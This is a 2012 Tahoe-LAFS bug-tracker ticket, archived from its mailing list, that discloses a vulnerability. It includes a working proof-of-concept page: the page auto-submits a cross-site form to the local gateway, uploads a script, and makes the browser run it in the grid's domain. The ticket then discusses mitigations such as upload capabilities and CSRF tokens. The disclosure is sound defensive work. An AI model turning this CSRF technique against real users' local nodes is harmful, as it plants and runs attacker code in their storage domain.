[tahoe-lafs-trac-stream] [tahoe-lafs] #1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.

tahoe-lafs trac at tahoe-lafs.org
Thu Nov 15 02:47:14 UTC 2012 

#1859: Proof-of-concept attack: Upload and execute attacker controlled js from any
domain.
----------------------+----------------------------
 Reporter:  nejucomo  |          Owner:  davidsarah
     Type:  defect    |         Status:  new
 Priority:  normal    |      Milestone:  undecided
Component:  unknown   |        Version:  1.9.2
 Keywords:            |  Launchpad Bug:
----------------------+----------------------------
 **Proof of Concept Attack**

 The following proof of concept shows how an html file loaded from any
 domain into (some) browsers with javascript enabled can inject an attacker
 controlled script into a grid, and *then* cause the user to execute that
 script in the domain of the grid:

 {{{
 <html>
 <head>
 <script>

 var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY
 ATTACKER CODE IN MAI DOMAIN " + document.domain +
 "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

 window.onload = function () {
   var payload_input = document.getElementById('payload_input');
   payload_input.value = PAYLOAD

   var the_form = document.getElementById('the_form');
   the_form.submit();
 }

 </script>
 </head>

 <body id="body">

 <p>
 demo attack:
 </p>

 <p>
 This page attempts to inject an attacker controlled script into a <a
 href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
 this file is loaded from.
 </p>

 <form id="the_form"
       method="POST"
 action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
       enctype="multipart/form-data"
       >
 <input id="payload_input" type="text" name="file"></input>
 </form>

 </body>
 </html>
 }}}

 **Mitigations**:

 There are several moving parts at work here.  The {{{when_done}}}
 parameter with uri substitution was very convenient.

 I think an upload capability would be the most consistent and thorough
 solution.  Removing bits and pieces which may otherwise be useful, like
 {{{when_done}}}, feels like a piecemeal defense.

 Requiring CSRF tokens may be more comprehensive, but also doesn't sit well
 with the rest of the capability model.  (A CSRF token would be a bit like
 a "make a this kind of http request" temporary capability.)

 **Related Tickets**:

 * #615 is more about boot-strapping an attack rather than illicitly
 gaining victim capabilities.
 * #1215 is about adding CORS support and how that may create a
 vulnerability; this script demonstrates even without CORS support similar
 vulnerabilities already exist.

-- 
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1859>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage

More information about the tahoe-lafs-trac-stream mailing list